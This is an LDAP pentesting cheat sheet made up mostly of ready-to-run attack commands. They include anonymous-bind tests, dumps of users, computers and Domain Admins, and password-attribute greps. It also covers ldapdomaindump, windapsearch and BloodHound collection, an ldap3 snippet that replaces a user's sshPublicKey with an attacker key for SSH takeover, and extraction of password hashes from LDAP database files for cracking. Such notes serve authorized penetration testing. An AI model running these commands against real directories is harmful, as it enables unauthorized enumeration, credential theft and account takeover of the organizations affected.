389, 636, 3268, 3269 - Pentesting LDAP

# Test for anonymous bind
ldapsearch -H ldap://<IP> -x

# Get naming context
ldapsearch -H ldap://<IP> -x -s base namingcontexts

# Dump everything
ldapsearch -H ldap://<IP> -x -b "<Naming_Context>"

# TLS SNI bypass (sometimes allows anonymous access)
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +

# Enumerate all objects
netexec ldap <DC_FQDN> -u '' -p '' --query "(objectClass=*)" ""

# Dump users
netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" ""

# Extract username list
netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" "" \
  | awk -F': ' '/sAMAccountName:/ {print $2}' | sort -u > users.txt

# Basic authenticated query
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' \
  -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

# Extract users
ldapsearch -x -H ldap://<IP> -D 'DOMAIN\john' -w 'johnpassw' \
  -b "CN=Users,DC=mydom,DC=local"

# Extract computers
ldapsearch -x -H ldap://<IP> -D 'DOMAIN\john' -w 'pass' \
  -b "CN=Computers,DC=mydom,DC=local"

# Extract Domain Admins
ldapsearch -x -H ldap://<IP> -D 'DOMAIN\john' -w 'pass' \
  -b "CN=Domain Admins,CN=Users,DC=mydom,DC=local"

# Extract Administrators group
ldapsearch -x -H ldap://<IP> -D 'DOMAIN\john' -w 'pass' \
  -b "CN=Administrators,CN=Builtin,DC=mydom,DC=local"

# Search for passwords in attributes
ldapsearch <cmd> | grep -i -A2 -B2 "userpas"

# ldapdomaindump
pip3 install ldapdomaindump
ldapdomaindump <IP> -u 'DOMAIN\username' -p 'password' --no-json --no-grep

# windapsearch
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users

import ldap3

# Connect (try without credentials first)
server = ldap3.Server('x.X.x.X', get_info=ldap3.ALL, port=636, use_ssl=True)
connection = ldap3.Connection(server)
connection.bind()  # True = anonymous bind allowed
print(server.info)  # Shows naming context, domain name

# Search objects
connection.search(
    search_base='DC=DOMAIN,DC=DOMAIN',
    search_filter='(&(objectClass=*))',
    search_scope='SUBTREE',
    attributes='*'
)
print(connection.entries)

# Modify sshPublicKey attribute (if SSH reads public keys from LDAP)
connection.modify('uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', {
    'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAA... attacker@evil'])]
})
# If SSH reads from LDAP: ssh -i attacker_private_key USER@target

# ldapsearch with Kerberos (GSSAPI)
ldapsearch -Y GSSAPI -H ldap://dc.domain.com -b "DC=domain,DC=com"

# NetExec LDAP BloodHound collection
nxc ldap <IP> -u <USERNAME> -p <PASSWORD> \
  --bloodhound -c All -d <DOMAIN.LOCAL> \
  --dns-server <IP> --dns-tcp

# If you have access to LDAP database files
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
# Feed password hashes to john (from '{SSHA}' to 'structural')

/etc/ldap/ldap.conf
/etc/openldap/slapd.conf
containers.ldif
ldap.cfg
ldap.conf
ldap.xml
ldap-config.xml
ldap-realm.xml